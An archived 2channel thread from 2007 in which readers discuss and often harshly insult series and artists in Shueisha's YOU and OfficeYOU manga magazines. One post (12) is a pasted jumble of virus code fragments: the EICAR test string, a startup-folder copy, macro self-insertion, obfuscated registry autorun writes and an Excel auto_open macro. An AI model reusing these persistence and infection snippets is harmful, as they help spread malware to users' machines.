5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

★☆★☆★《  YOU 13  》★☆★☆★

1 :花と名無しさん:2007/01/14(日) 23:30:48 ID:???P
集英社のコミック雑誌『YOU』『OfficeYOU』について語りましょう。
『YOUNG YOU』は単独スレがありますのでそちらへどうぞ。

このスレのお約束
・ネタバレな内容のカキコは公式発売日 正午 以降
・それでも思いがけない事故はあるものなので、ネタバレが絶対イヤな人は自衛して
 発売日前後は「自分が読んでから」スレに来るようにしてください。
・煽りがあってもレスを返さないようにお願いします。余計、荒れる元です。
・980を踏んだ人はスレ立てよろしく。

前スレ
http://comic7.2ch.net/test/read.cgi/gcomic/1160899828/

2 :花と名無しさん:2007/01/14(日) 23:34:17 ID:???0
YOU公式HP
ttp://you.shueisha.co.jp/
OfficeYOU公式HP
ttp://officeyou.shueisha.co.jp/sobisha/

・関連リンク


★塩森恵子さんの作品を語りましょう★
http://comic6.2ch.net/test/read.cgi/gcomic/1116774973/
★【ごくせん】 森本梢子9 【研修医なな子】★
http://comic7.2ch.net/test/read.cgi/gcomic/1166369470/
◎まっすぐに行こう◎きら◎シンクロオンチ◎
http://comic6.2ch.net/test/read.cgi/gcomic/1061308498/
【義父母とは】井上きみどり6【仲良しですよ?】
http://comic7.2ch.net/test/read.cgi/gcomic/1155049968/
【エロ】酒井美羽【レディコミ?】
http://comic6.2ch.net/test/read.cgi/gcomic/1116268336/
【ドゥダダン】★ 槇村さとる 2 ☆【再開】
http://comic7.2ch.net/test/read.cgi/gcomic/1156939692/
高橋由佳利 3
http://comic6.2ch.net/test/read.cgi/gcomic/1147351988/
萩岩睦美 3
http://comic7.2ch.net/test/read.cgi/gcomic/1146652801/
鴨居まさね
http://comic7.2ch.net/test/read.cgi/gcomic/1090254283/
【悪女(わる)】深見じゅん【ぽっかぽか】
http://comic6.2ch.net/test/read.cgi/rcomic/1104745073/(懐かし漫画板)
レディースコミック総合スレッド 2
http://comic6.2ch.net/test/read.cgi/gcomic/1101665427/

3 :花と名無しさん:2007/01/14(日) 23:35:25 ID:???0
過去スレ
01:http://comic.2ch.net/gcomic/kako/991/991274181.html
02:http://comic.2ch.net/gcomic/kako/1015/10158/1015819982.html
03:http://comic.2ch.net/gcomic/kako/1033/10334/1033483129.html
04:http://comic6.2ch.net/test/read.cgi/gcomic/1041243976/
05:http://comic6.2ch.net/test/read.cgi/gcomic/1054722199/
06:http://comic6.2ch.net/test/read.cgi/gcomic/1077255229/
07:http://comic6.2ch.net/test/read.cgi/gcomic/1096718985/
08:http://comic6.2ch.net/test/read.cgi/gcomic/1115466306/
09:http://comic6.2ch.net/test/read.cgi/gcomic/1126787190/
10:http://comic6.2ch.net/test/read.cgi/gcomic/1137703887/
11:http://comic6.2ch.net/test/read.cgi/gcomic/1150034063/
12:http://comic7.2ch.net/test/read.cgi/gcomic/1160899828/

4 :花と名無しさん:2007/01/15(月) 01:53:44 ID:???0
>>1
スレ立て乙!

ただ前スレもそうなんだけど〜、「YOUNG YOU」って、1年以上前に廃刊(休刊)になったんじゃ?
>>1の文面、次から見直した方がよいのでは???
(参考)→ttp://youngyou.shueisha.co.jp/01magazin/new04/index.html

5 :花と名無しさん:2007/01/15(月) 12:16:20 ID:???0
関連スレ追加

岩館真理子5
http://comic7.2ch.net/test/read.cgi/gcomic/1147278245/

6 :花と名無しさん:2007/01/15(月) 12:46:07 ID:???0
おう、そういえば岩館先生はベッドシーンないね。なくても良い作品は書けるわけよ。

7 :花と名無しさん:2007/01/15(月) 12:50:55 ID:???0
でもちょっと鬱陶しいけどなw

8 :花と名無しさん:2007/01/15(月) 12:54:44 ID:???O
>>1乙です!

田辺、あまねはもうクルナ!なんじゃあの表紙は‥

来月号の山本真理子が楽しみだけどパンケーキは休みなんだね。

9 :花と名無しさん:2007/01/15(月) 14:54:17 ID:???O
>>1


10 :花と名無しさん:2007/01/15(月) 15:16:30 ID:VqRZBO1aO
槙村あり得ない。
ボディのコーディネート
プラダにでてきたのに激似だし
ここまで、類似させると
あの映画好きな私はかなりムカついた
内容似通っていても、まぁ許せるかぁて思ってたけど
映画の中のファッションまで似せるなっ
イマジンの次の奴から
面白くないって思っていたけど
本当に今回のは無理っ。
担当編集者も何も言わないのか
無知なのかしらないけど
あれはかなりパクリすぎっ。

11 :花と名無しさん:2007/01/15(月) 17:36:29 ID:???0
前スレ>986さん

私も、あまねの「妊婦の喫煙率83%」はいくらなんでもアリエネーと思い
引用元の健やか親子21の公式ホームページに行ってみました。
…「8.3%」だよ、ケタ間違えてるよぉぉ…
アマネが間違ったのか誤植かわからんけど、編集も校正の段階で
ヘンだと思わなかったのかね〜?



12 :花と名無しさん:2007/01/15(月) 18:50:35 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


13 :花と名無しさん:2007/01/15(月) 20:31:37 ID:???0
あまねさん落ち着いて!それともデブ息子?

14 :花と名無しさん:2007/01/15(月) 21:20:26 ID:???0
電車男とエルメスに思いっきり引いた。

15 :花と名無しさん:2007/01/15(月) 21:36:31 ID:???0
あまねはそのとき見たテレビ番組をそのまま漫画に取り入れる習性があります。
ダイオキシンが問題になったときは、ゴミを庭で燃やしている場面を取り入れて「ダイオキシン!!」
そうそう、ドクターコトーのパクリも記憶に新しいですね。
今回は、ネトゲにはまる人間を扱った番組を見たようです。
ついでに電車男も知っていたので、絡めて見たようです。

あまねイラネ。

16 :花と名無しさん:2007/01/16(火) 00:00:31 ID:???0
槙村のあのヒロイン。
仕事中も、仕事終わっても髪の毛後ろでひとつに
くくってるくせに今更いけてないってアホかと。死ねよ

17 :花と名無しさん:2007/01/16(火) 02:27:52 ID:???0
>>10
よくあるコーディネイト、って言えなくもないけど
作品自体がデジャブだからもうパクリにしか見えなくなるよね

18 :花と名無しさん:2007/01/16(火) 04:45:31 ID:???0
パティスリーMON…今回はなんかにまにましながら読んだ。雪の行動や
言葉すべてがうっとおしくてワロス

シンクロオンチ!…すごーくほのぼのとたのしめた。今までの積み重ねが
あるからキャラクターに愛着があるし、見せ方が上手いから、
近況報告っぽい話でもおもしろい。

カンナさーん!…今シリーズの登場人物は特に魅力的だし、困難が大きいから
ぜひ解決して欲しい!どうやって解決するの!?と興味が引っ張られる。

離婚記念日…息子を置いて家を出ようと思う早紀はあさはかだけど、早紀の
実家が迷惑をかけている(しかもDQN)のはほんとうだから、気の毒に思う。
反対に須堂さんの兄弟関係がほほえましいことに。

蜃気楼…こういうふうに思い返させるなら、純が瞳を殺してしまう流れを
瞳が純を気味悪がって離れるというのではなく、なんというか、純の(マトモな)
深い愛よりも家庭をとったみたいな形にしたほうがよかったかなー。

ちゅうりっぷ…あっさり「体を重ねるふたり」(柱より)があさはかすぎて、
感情移入できない。お互いの立場をわきまええろ。

椿…臨月の妊婦に「がんばってみませんか」って…もはや産むしかないと
思うんだけど、流れから言って無痛分娩じゃなく通常の出産を勧めてるのか。
なら、無痛分娩では「産んでよかった」とは思えないのか。

本は厚いけど、微妙な作品が多くて読んでて疲れる。
シメが椿だし…orz
(みきりんがあるけれど、アレは先に読むから。)
今までは、それぞれの味があると思ってたけど、今の時点では自分的には
ビーラブにはっきり負けてると思う。
どっちにも老害はいるけど。

19 :花と名無しさん:2007/01/16(火) 08:40:37 ID:???0
>>18
ちゅうりっぷって話
「感情移入できない。立場をわきまえろ!」に禿禿同意
また読者の年齢の話になっちゃうけど
あの保育士にしてもヤンママにしても「あ〜わかる〜」って年齢を
超えてしまってる読者がほとんどだから
逆に「何甘えてんの?」と反感しか感じないと思う
コーラスで連載中のペコの中学生(高校生?)の話は
素直にあのころの心を思い返させてくれるんだけどね

20 :花と名無しさん:2007/01/16(火) 09:40:44 ID:???0
MON、先生ってもしかして確信犯??って思ってしまった。
高級志向が強くて自分の妨げになる物は手段選ばず排除する性格??って。
店に乙女を入れたせいでMONが庶民臭い店になってくのが嫌で
自分に片思いしてる、と判ってる上で乙女に告った気がした。
そうすれば乙女が自分の言いなりになるか店辞めるかするだろう…って策士してる気がする。

深読み満開かもだけどw


21 :花と名無しさん:2007/01/16(火) 10:35:45 ID:nNP+b0ws0
どっちかっていうと、「大門のこと尊敬しているから、彼みたいになりたい。
彼の好きなものを手に入れると、自分も素敵になる気がする。手に入れたい!!」
「彼が女のせいで変わるのをみたくない!」っていうタイプのような気がするなぁ。


22 :花と名無しさん:2007/01/16(火) 11:28:26 ID:???O
どっちにしてもくせ者だね>先生
実はラスボスだったのか!?

23 :花と名無しさん:2007/01/16(火) 12:18:00 ID:???O
自分は、学生時代の描写とかみて
先生は意外と昔からオトメのこと意識してたんだなと思った。
あと、先生と大門は最終的に目指す方向違うようだから
先生はいずれMONを辞めそう。その時オトメが
どっちについてくか選択迫られるのかな。

店が庶民的になったのはオトメのせいってわけじゃ
ないよね?ロールケーキの件では庶民化に一役かったけど
アンパンマンケーキとかはオトメが入る前から
引き受けてたんだし。
目指す店の方向としては先生よりもオトメの方が
大門に心が近いね。

24 :花と名無しさん:2007/01/16(火) 13:28:36 ID:???0
>>23
以前先生がパティシエを目指した理由として音女のお菓子作りを理由にあげてたから
いまさら驚くことでもないと思うんだが>オトメのこと意識してた
つーか先生はMON辞めないと思うよ
先生が大門好きなのはデフォで音女をやめさせたくて仕方ないんだと思う
庶民的になったというかケーキ作りに対する姿勢が変わったのは
乙女が一枚噛んでるのは確かだもの

25 :花と名無しさん:2007/01/16(火) 13:45:28 ID:???0
シンクロ、おもしろかったよ!
どーでもいいが、鎌田コーチって下の名前とか年齢とか
明かされたことってあったんだっけ?

26 :花と名無しさん:2007/01/16(火) 19:42:41 ID:???O
コーチ年は29かな?銀ちゃんが言ってた@コミックス2巻
でも下の名前わからんわ

27 :花と名無しさん:2007/01/16(火) 20:51:51 ID:???0
でもMONに誘ったのは先生なんだからなぁ。
上手とはいえ元は素人のオトメを店に誘った時点で
庶民化する可能性は考えなかったのかな?

28 :花と名無しさん:2007/01/16(火) 22:03:20 ID:???O
ほんとに音女を追い出す気なら
あのタイミングで雪と別れるはずないな
雪のお陰でせっかく音女が居づらいムードになってたのに

29 :花と名無しさん:2007/01/16(火) 22:05:45 ID:???0
田辺真由美、想像通りのオチだった。
本当につまんねぇなーこの人。早く消えてくれよ。

30 :花と名無しさん:2007/01/16(火) 22:40:06 ID:???0
>>29
来号は、なんとカラーでも登場。
ページも増えるらしいね。

需要なんてないのにね…

31 :花と名無しさん:2007/01/16(火) 23:37:25 ID:???0
あまねの漫画の奥さん、乳首黒すぎ。
もうちょっと薄いトーンつかってやんなよ。
自分をモデルにしてないだろうな、あまね。

32 :花と名無しさん:2007/01/17(水) 02:17:26 ID:???0
あまねさん大丈夫?
最近はむかつくというより本当に心配になってきた。
表紙気持ち悪すぎですよ。なんで編集もオッケーだすの?

33 :花と名無しさん:2007/01/17(水) 05:27:12 ID:???0
大ちゃんあのまま成長すると福島瑞穂の男版だな。
東大法学部卒で社会党委員長。頭は良いはずなんだけど。

34 :花と名無しさん:2007/01/17(水) 08:20:31 ID:???0
>>27
あくまで自分の妄想ですが
先生は音女は大門の一番嫌いなタイプと見ていたんじゃないだろうか
ですぐ大門に嫌われて出て行くと思ってたのでは?と
なんだかんだお気に入りになって大門の雰囲気まで変えてしまう存在になるとは
計算外だった?

>>28
いづらい雰囲気になってたのは雪が先生の彼女だと思ってたから
このままいくと音女が大門とくっつくのは時間の問題って先生も気づいちゃった?
多分先生が音女に告白した後「付き合ってる子が店にいたらやりにくい。
 雪がそうだったように。やめてくれ」ともっていくんじゃない?

35 :花と名無しさん:2007/01/17(水) 10:21:30 ID:wc/mUQIL0

離婚・・・智兄ちゃんは頭が悪いとか言われてたはずのなのに、弁護士だったのか・・・。
しかも、最近は有能な発言多いし。

36 :花と名無しさん:2007/01/17(水) 10:36:47 ID:???0
智兄ちゃんもいい人に巡り会えるといいのにねえ。
いいパパになりそうなのに。

37 :花と名無しさん:2007/01/17(水) 10:37:19 ID:???0
>>31
地味にワロタw

38 :花と名無しさん:2007/01/17(水) 11:03:07 ID:???0
>>31
まだ今号読んでないんだけど、どんなに黒いんだか見たくてたまらない。
あまねを楽しみにするなんて初めてだw

39 :花と名無しさん:2007/01/17(水) 11:20:59 ID:oTIIjB010
離婚はキャラや考え方がコロコロ変るなー
昔は兄ちゃんは愚鈍だったのに今はしっかりものの弁護士

田辺が合コンで番号も聞かれないのは「先生がマジメだから」としてるが
ブスで性格悪く年増でバツ一子持ちだからな気がする

40 :花と名無しさん:2007/01/17(水) 13:19:00 ID:???O
田辺は谷原を嵌めた女より劣るなw

41 :花と名無しさん:2007/01/17(水) 17:57:07 ID:???0
田辺のさもしさ全然笑えねえ。
バツありシングルマザーの実録男漁り記って
需要あんのかね。少女漫画的な部分がなくちゃ
見苦しいとしか思えんな

42 :花と名無しさん:2007/01/17(水) 18:23:04 ID:???0
>>38
今号は電車男…のくだりも良かったよw
なにその唐突さwどんな影響の受け方だよww
ってコンビニでふいてしまった

43 :花と名無しさん:2007/01/17(水) 18:58:15 ID:OQZ7LCNSO
>>42
コンビニかよ!

44 :花と名無しさん:2007/01/17(水) 21:52:23 ID:???0
トビラ絵ワースト大賞があればノミネートしたい
>あまね黒乳首

45 :花と名無しさん:2007/01/17(水) 22:01:12 ID:???0
>>43
ごめん、売上に貢献したくないんだ…
気に入った人のコミクスは買ってるから許して

46 :花と名無しさん:2007/01/17(水) 22:03:31 ID:???O
アキヤマさんの雑さがどうも受け付けないけど、あまねよりはマシ。
末期&酒井を連れてYOUから一刻も早く撤退して頂きたい。

47 :花と名無しさん:2007/01/17(水) 23:08:24 ID:qnk+VpkQ0
アキヤマさんはまだ新人だからしょうがない 
暖かく見守ってやろうと言う気になるけど
あまねはどうしようもない あと、きみどりもつまんなかった

48 :花と名無しさん:2007/01/17(水) 23:30:02 ID:8NsPkJFP0
YOU遊探検隊に載ってたところに行きたい

49 :花と名無しさん:2007/01/18(木) 00:55:30 ID:???0
アキヤマさんは、昔ナ○トの同人誌描いてたんではないかな
絵を見たことがあるような気がする

50 :花と名無しさん:2007/01/18(木) 08:22:07 ID:???0
表紙の女子高生コスのきみどりが痛すぎる
お前は何様のつもりだと小1時間ry
今となってはひとりブスに描かれるポチが不憫。

51 :花と名無しさん:2007/01/18(木) 09:44:19 ID:???0
>>49
どこにでもありそうな絵だしなぁ

52 :花と名無しさん:2007/01/18(木) 18:03:32 ID:???0
プラダ、りょうさんの彼氏(?)は、あのモヒカンなのかな。
先号でちらっと描かれてた全体像にモヒカンらしきものが。
に、してもなかなかチ○ポミキとの対決にならないね。

蝶子、ハーバードさんはあれでおしまいなの?
ほんとどうでもいい役だったね。

カンナさん、今回の父娘のエピソードも、これだけで読みきり描けそう。
こういうちょっとしたいい話が上手いな。

53 :花と名無しさん:2007/01/18(木) 19:24:48 ID:???0
>>52
対決にならないのは「プラダ…」そっくりの指摘が多いからかと。

54 :花と名無しさん:2007/01/18(木) 22:02:21 ID:???0
兆個、総支配人のキャラはちょっと好きかも。私はロクよりこっちだな。

55 :花と名無しさん:2007/01/19(金) 05:49:49 ID:???0
キンゾー、あれもう終わって欲しい。
下の子が生まれたらまたそこからネタ拾って続ける気なのかなあ。
特に珍しくも面白くもない人んちの子供ネタを延々続けられても読む気しない。
ただの子供観察日記ならブログでやってくれ。


56 :花と名無しさん:2007/01/19(金) 07:25:41 ID:???0
私はキンゾウ好き。オフィスユーのハハの細道より
ずっと面白いと思って読んでる。
私自身、キンゾウみたいな子が好みだからかな。

57 :花と名無しさん:2007/01/19(金) 08:32:13 ID:???0
チビ子の話、前回の内容を忘れたのか後半ゴチャゴチャしてよくわからん。
コミクで読めば面白いのかな

58 :花と名無しさん:2007/01/19(金) 08:40:45 ID:???0
私もキンゾー好き。
毎回楽しみにしてる。
4コマだからあっさり読めるし

59 :花と名無しさん:2007/01/19(金) 09:05:21 ID:???0
私もキンゾー面白いと思ってる
変なお説教子育て漫画より全然いい

60 :花と名無しさん:2007/01/19(金) 09:30:44 ID:???0
キンゾーの作者乙

61 :花と名無しさん:2007/01/19(金) 11:43:15 ID:???0
私も金造好きだ。初めは
読むだけなのにうるさいガキが側にいるようなうっとおしさと
絵があまり好きではなかったのだけど、(金造の口の部分)
慣れたのと、時々ほんのり感動話なんかが混じってていつのまにか
好きになった。絵が時たま、相原コージのコージ苑に似ていると思うときがある。

私はきみどりのほうがつづかないでほしいわ・・・


62 :花と名無しさん:2007/01/19(金) 12:10:27 ID:???0
鱚で連載の赤ちゃんの奴隷という育児漫画があるけど
あれは親の心情の描写がうざくてキライ
それに比べてキンゾーはお茶の間目線で読みやすいよ
育児経験者は育児漫画の行間を読むからあっさりかかれている方がいい

63 :花と名無しさん:2007/01/19(金) 12:10:46 ID:???O
田辺にページ割くなら、キンゾー増やした方がマシ。

64 :花と名無しさん:2007/01/19(金) 12:12:35 ID:???0
なにこのキンゾー絶賛www

どこから見ても作者カキコ丸出しwww

65 :花と名無しさん:2007/01/19(金) 13:24:01 ID:???0
カンナさん、森ミンクはどうなるんだろう?
手っ取り早くモデルに復帰とかだと、
売春してたのがマスコミにばれちゃったらまた大問題だし。
カリスマ店員になるとか?

66 :花と名無しさん:2007/01/19(金) 13:43:47 ID:???0
っていうか、あんな大量の大麻持っていて黙秘で釈放なんてされません

67 :花と名無しさん:2007/01/19(金) 14:57:01 ID:???0
4コマなら、オフィスユーの独身OLのがいいなぁ。
くすっと笑える。

末期のプラダとカンナさんって何気にファッション分野ということでかぶってるよな。
末期のお洒落な登場人物がカンナさんを見たらなんというのだろうか?
カンナは今は販売員しているわけだし。

68 :花と名無しさん:2007/01/19(金) 15:04:09 ID:???0
カンナさんなら、プラダ婆とトサカ男に何言われたって気にしないと思う。
デブの大猿と言われたって、「そうですが何か?」と胸を張るだろうし
まして中身がどうとか、自分を知っているかとかなんて鼻息で飛ばしそうw
でもデザインのセンスとか、売り上げのことを言われたらグッと詰まるかな。
んでも発憤して前進。カンナさんは前向きだし、「前」の方向がブレないしね。

69 :花と名無しさん:2007/01/19(金) 15:14:53 ID:???0
岩館さんのちび子、第一話は良かったけど
話が続くにつれどーでもよくなってきた・・・
登場人物が全員なんらかのつながりがあるって、
前作のアマリリスもそうだったよね。
なんか安易でなぁ・・・

70 :花と名無しさん :2007/01/19(金) 16:18:55 ID:???0
岩館さんのは、中途半端なコメディより
ラブストーリーに徹した話が読みたい・・・

71 :花と名無しさん:2007/01/19(金) 16:58:05 ID:???0
>>49
アキヤマさんのホームページ見つけたけど、
確かにナ○ト中心サイトだった

72 :花と名無しさん:2007/01/19(金) 18:36:39 ID:???0
キンゾーに感動話しとか、あったっけ????
まったくもって思い付かないんだが……

73 :花と名無しさん:2007/01/19(金) 19:02:52 ID:???0
歯医者に行ったらあまねのコミクスが山積みになってて目眩がした。どうかYOUで表紙描いたりしませんように。つーか一号でも早く出てってくれますよーに。

次号で空海は終わり?またすぐ新連載始まるのかな・・。

74 :花と名無しさん:2007/01/19(金) 20:03:46 ID:???0
>>72
作者自らの宣伝ですから釣られないようにね♪

75 :花と名無しさん:2007/01/19(金) 21:14:28 ID:???0
キンゾー、感動話は思い出せないけど、作者の自演とは全然思わない。
だって一つの作品をくさす意見がでたら擁護が続くのは当たり前のことでしょ?
まぁあまねみたいなクソ作品だと擁護も出ないけどさ。

76 :花と名無しさん:2007/01/19(金) 21:36:04 ID:???O
キンゾー読んだ事ないや‥。
あまね、デ●ールで表紙だったね。思わず目を背けたけど。
津雲さんとカンナさんが表紙の時は正直買いにくい。あまねなら買わない。

77 :花と名無しさん:2007/01/19(金) 21:38:49 ID:???0
離婚の表紙の絵、真澄が猫むすめみたいw

78 :花と名無しさん:2007/01/19(金) 22:32:25 ID:???0
キンゾーうざ

今、YOUの中は新年度への査定の時期なんだね。
これから子供も生まれるんだったらそりゃ必死だわなw
ダンナも稼ぎ少なそうだしw

79 :花と名無しさん:2007/01/19(金) 23:26:39 ID:???O
あのお見合いマンガ、無事結婚できるまで連載続けるんだろうか
いぬまんの人のお見合いマンガの方が自虐が入って面白そうだ


80 :花と名無しさん:2007/01/19(金) 23:32:32 ID:???0
>>79
いぬまんの人はリアルでは結構カワエエらしい。

81 :花と名無しさん:2007/01/19(金) 23:33:07 ID:???0
今回のYOUは全体的につまんなかった。

離婚…もう人物設定やストーリーがめちゃくちゃ。ネタギレなんだろうね。
蜃気楼…この人の漫画っていつも暗いから気分が滅入る。
MON…面白い展開になってきたねー。
エリカ…まぁ読めてたパターンだね。この先も読めるけど。てか藤原ちゃんカワイソ。
カンナ…カンナがウザい。見てて腹立つ。
ひみつ…まだこのシリーズやるの?つまんないんだけど。
以下省略。

とにかく最近のYOUは無駄に分厚いくせに内容が薄っぺらだから
全然読んだ気がしない。金返せ。

82 :花と名無しさん:2007/01/19(金) 23:52:20 ID:???0
キンゾーつまらん。見てない。
最初は作者、己の顔ぶさいくに書いていたけど
最近小ましに書いてんのw


83 :花と名無しさん:2007/01/20(土) 00:43:23 ID:???0
ああ、保育園の漫画かいてる人やっぱり同人やってたんだ
行間やノリ、執事カフェいきたいとかいったレポ読んでオタク臭いと思ったら
案の定ですか、同人やってる人好きじゃないし、
主婦向けのYOUでやるならもうちょっと抑えたほうがいいんじゃない
今回のYOUはとくに感想ない話が多かった
離婚記念日、須藤は傲慢ワンマン社長じゃなかったっけ。なんかへたれてる
真澄が誰かに似てると思ったら、渡鬼の子役の女の子に似てたのか
スタイルよくて頭小さいのに、団子鼻で顔が残念ってそっくり
あまね、乳首黒すぎ、ガラかめの月影先生といい勝負
ホステス漫画、2流を1流に押し上げる力とかむずがゆい説得力なし。絵のせいか、原作のせいか
金造の話は嫌いじゃない。育児やったことないからふーんそうなんだ、くらいで読んでる
よその子を注意したエピソードは感動した

84 :花と名無しさん:2007/01/20(土) 01:23:24 ID:???O
アキヤマさん連載持つの早いね。2作目なのに。そんなに人気あんのかな‥
とりあえず、万が一ここの住人の中から誰かがデビューしたら応援する。誰かいませんかー?あまね、末期、酒井を追い出してくれそうな人ww

85 :花と名無しさん:2007/01/20(土) 03:09:01 ID:???0
結構きみどり嫌いな人多いんだねー。
ポチが赤ちゃんの頃から見てるから変に親心ついてしまって連載が無いと
ポチとケロ元気かなーとか思ってしまうwいくらつまんなかろうが。
妙な漫画描くぐらいなら子供なんて!やって欲しいかな。
昔やってたわたしがママよ?だっけ?あれのたまちゃんとかもう大きいんだろうな〜。

86 :花と名無しさん:2007/01/20(土) 04:51:14 ID:???0
いぬまん 時たま平気でけらえいこパクるから嫌い。
キンゾー嫌いという意見は別にいいけど、擁護すると作者乙とか馬鹿みたい。

87 :花と名無しさん:2007/01/20(土) 06:37:28 ID:???0
High、B級昼ドラみたい
ロータスガーデンは面白かったのに、
同じ原作者とは思えない

88 :花と名無しさん:2007/01/20(土) 06:42:34 ID:???0
いぬまん作者、どのマンガもありとあらゆるものからパクリまくってるので、
たまに知らないネタでクスッとくるようなものがあっても、どうせパクリだろ…
としらっとしてしまう。

キンゾー、第二子が出来たことが判明してから、わりとかわいく思えるようになった。
自分が第一子だからだろうな…。

89 :花と名無しさん:2007/01/20(土) 10:26:35 ID:???0
>>87
多分、絵のせいだと思う。
あの絵柄は全てを安っぽくさせる。

90 :花と名無しさん:2007/01/20(土) 10:37:20 ID:???0
だからキンゾーの作者必死だってばw

91 :花と名無しさん:2007/01/20(土) 11:04:07 ID:???0
>90
あなたこそなんでそんな決め付けに必死なの?

92 :花と名無しさん:2007/01/20(土) 12:27:08 ID:???0
>>87
ロータスガーデンとHighの作者は別人だよ。
前スレでも間違えてた人いたけど。
ロータスガーデンの作者は小塚敦子。
今他紙で旅行添乗員もの描いてて結構楽しみにしてるので
Highの作者なんかと一緒にされるとなんかイヤw

93 :92:2007/01/20(土) 12:29:11 ID:???0
あ、漫画家ではなくて原作者のこと言ってたのか。
えらそうに書いてゴメン

94 :花と名無しさん:2007/01/20(土) 13:53:54 ID:???0
このキンゾー大絶賛が事実だとしたら、YOU自体の読者層のセンスが
雑誌に反映されていると言うことになるね。
そりゃ雑誌そのものがつまらなくなるハズだわw

95 :花と名無しさん:2007/01/20(土) 14:12:23 ID:???0
うちの子、金造と月齢が近いんだけど、だからなのか激しくツマラン
普通の子を普通に描いてどこにも面白みがない。
ただの育児日記、それ以上でもそれ以下でもない。

96 :花と名無しさん:2007/01/20(土) 15:28:15 ID:???0
キンゾーは安易にシモネタを採用するところが嫌いだ。
あと関西弁に馴染みがない。夫が汚い。

97 :花と名無しさん:2007/01/20(土) 15:35:38 ID:???0
金ぞーでこんなにレスがあるなんて、ある意味人気者だね。

98 :花と名無しさん:2007/01/20(土) 15:40:12 ID:???0
だから関係者のカキコだってばw

99 :花と名無しさん:2007/01/21(日) 16:42:24 ID:???0
>>85
あ、わかる!
きみどりさんの描く普通のマンガは、ぜっんぜんおもしろくない!
絵もなんか変だし。
それよりも、ポチやケロのマンガのほうがずっとよい。

100 :花と名無しさん:2007/01/21(日) 17:17:47 ID:???0
細川てんてんに復活して欲しい。

101 :花と名無しさん:2007/01/21(日) 21:37:12 ID:???O
ぬくぬくをレギュラーにしてほしい。

102 :花と名無しさん:2007/01/21(日) 23:04:26 ID:???0
“ひみつ”の展開って、
若作りしてみたら、今でも結構イケる . . .
いや . . . 何を着ても オバサンはオバサンだな
やっぱり . . .

みたいなのが多くない?

103 :花と名無しさん:2007/01/21(日) 23:34:02 ID:???0
>>99
人魚姫は、感情移入のしようの無い話だったけど、
銀田一は結構楽しめた

↓銀田一ダイジェスト
#1 むっちむちのダイナマイトのマルちゃんの全裸にに わお…
  立派な朝立ちの銀田一のムスコに わお…
#2 本当の姿を見せ合うことが 一番必要なことじゃけぇ…
  マルちゃんのプクプクのお腹は かわいくて 愛しくて
#3 毒舌マルちゃん 夜は ワオ…ってくらいすごいのに

104 :花と名無しさん:2007/01/22(月) 00:33:48 ID:???0
よく作者が降臨するスレだなw

105 :花と名無しさん:2007/01/22(月) 06:29:29 ID:???O
気持ち悪い

106 :花と名無しさん:2007/01/22(月) 09:17:05 ID:???0
MONの先生、マジ告白なのかいまいちわかんないな。
なんか、裏がありそうなキャラになってしまった。
そろそろ先生の本音を描いてくんないかな。
今のまんまではかませ犬臭がプンプンする。


107 :花と名無しさん:2007/01/22(月) 09:40:58 ID:???0
キンゾー作者乙とか言ってる人は
キンゾー作者に代わって育児漫画描きたい売れない漫画家じゃない?

私も最初はナニこれ?感じだったけど
最近じゃ近所のオバちゃん気分でキンゾー一家を見守ってる気分
ちなにみ>59のレスも私です

108 :花と名無しさん:2007/01/22(月) 09:55:49 ID:???0
>>107
キンゾー作者乙

書けば書くほど特徴が出ていることいいカゲン気づけよ

109 :花と名無しさん:2007/01/22(月) 10:58:58 ID:???0
ちなみにどういう特徴でしょうか?w
後学のために聞いてみたいっつーか
「最新50」の中では59と107のみだけなんだが
その前はMONについての妄想を散々垂れ流してたものですけど
>>108が私のレスだと思うのを抽出してほしい♪

110 :花と名無しさん:2007/01/22(月) 11:06:08 ID:???0
>>107
相手にしない方がいいのよ。
○○の作者乙っていってりゃ煽れると思ってるのよ。
本気で思ってるとしたらアホと思うけど。

111 :花と名無しさん:2007/01/22(月) 11:45:55 ID:???0
>>109
顔が真っ赤だよw

112 :花と名無しさん:2007/01/22(月) 12:41:42 ID:???0
もうやめてぇん。離婚予定日はタイトル変えてぇ。
てか、また離婚するならOkかな?

113 :花と名無しさん:2007/01/22(月) 12:46:04 ID:???0
>>110
おっさるとおりにしますわ

114 :花と名無しさん:2007/01/22(月) 12:59:09 ID:???0
複数の読者を装ってアンケート偽造するのはよくあること。
いまネットからでもできるからね。
でもアクセスチェックしていることもお忘れなくw

115 :花と名無しさん:2007/01/22(月) 16:20:59 ID:???0
キンゾー作者と銀田一作者の自演がうざいのはわかった

116 :花と名無しさん:2007/01/22(月) 16:27:55 ID:???0
山岸先生、いまテレプシ休みだし、50ページくらいの短編一本書きませんか〜

117 :花と名無しさん:2007/01/22(月) 18:55:49 ID:9RWMxTLr0
>>103って何!!?w

118 :花と名無しさん:2007/01/22(月) 19:27:04 ID:???0
>>116
テレプシは休みだけど同じダヴィンチで同じバレエ物で短期連載?
やってるから無理でしょう。

119 :花と名無しさん:2007/01/22(月) 20:57:51 ID:???0
○○の作者乙ってのがうざいから
この板もID表示出るようにしてほしいなぁ。
一人だけで必死に○○の作者乙って言ってるのもまるわかりになりそう。
(まぁ今でもまるわかりだけど)

120 :花と名無しさん:2007/01/22(月) 21:09:22 ID:???0
>>117
ttp://strawberry.web-sv.com:900/Sn/5/iuy/bh7986.jpg

